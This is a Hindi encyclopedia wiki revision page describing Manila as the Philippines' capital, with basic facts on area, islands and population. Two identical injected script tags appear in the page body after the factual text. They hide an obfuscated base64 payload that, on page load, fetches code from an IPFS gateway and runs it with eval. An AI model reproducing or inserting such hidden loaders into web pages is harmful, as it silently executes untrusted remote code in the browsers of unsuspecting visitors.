Difference between revisions of "मनीला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''मनीला''' (अंग्रेज़ी: ''Manila'') एक ख़ूबसूरत नगर है, जो फ़िल...' के साथ नया पन्ना बनाया)
 
 
Line 1: Line 1:
'''मनीला''' ([[अंग्रेज़ी]]: ''Manila'') एक ख़ूबसूरत नगर है, जो फ़िलिपीन्स की राजधानी है। इसका भौगोलिक क्षेत्रफल 38.55 वर्ग किलोमीटर है।
+
'''मनीला''' ([[अंग्रेज़ी]]: ''Manila'') एक ख़ूबसूरत नगर है, जो [[फ़िलिपीन्स]] की राजधानी है। इसका भौगोलिक क्षेत्रफल 38.55 वर्ग किलोमीटर है।
  
 
*फ़िलिपीन्स देश करीब सात हज़ार [[द्वीप|द्वीपों]] से बना है, जिसमें सबसे बड़े द्वीप हैं- 'लूज़ोन', 'विसायास' और 'मिन्डानाव'।
 
*फ़िलिपीन्स देश करीब सात हज़ार [[द्वीप|द्वीपों]] से बना है, जिसमें सबसे बड़े द्वीप हैं- 'लूज़ोन', 'विसायास' और 'मिन्डानाव'।
 
*देश की राजधानी मनीला लूज़ोन द्वीप के दक्षिण में सागर तट पर है।
 
*देश की राजधानी मनीला लूज़ोन द्वीप के दक्षिण में सागर तट पर है।
*16 लाख की जनसंख्या के साथ मनीला फ़िलिपीन्स का दूसरा सबसे अधिक जनसँख्या वाला महानगर है।
+
*16 लाख की जनसंख्या के साथ मनीला [[फ़िलिपीन्स]] का दूसरा सबसे अधिक जनसँख्या वाला महानगर है।
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक= प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 10:11, 26 February 2015

manila (aangrezi: Manila) ek khoobasoorat nagar hai, jo filipins ki rajadhani hai. isaka bhaugolik kshetraphal 38.55 varg kilomitar hai.

  • filipins desh karib sat hazar dvipoan se bana hai, jisamean sabase b de dvip haian- 'loozon', 'visayas' aur 'mindanav'.
  • desh ki rajadhani manila loozon dvip ke dakshin mean sagar tat par hai.
  • 16 lakh ki janasankhya ke sath manila filipins ka doosara sabase adhik janasankhya vala mahanagar hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>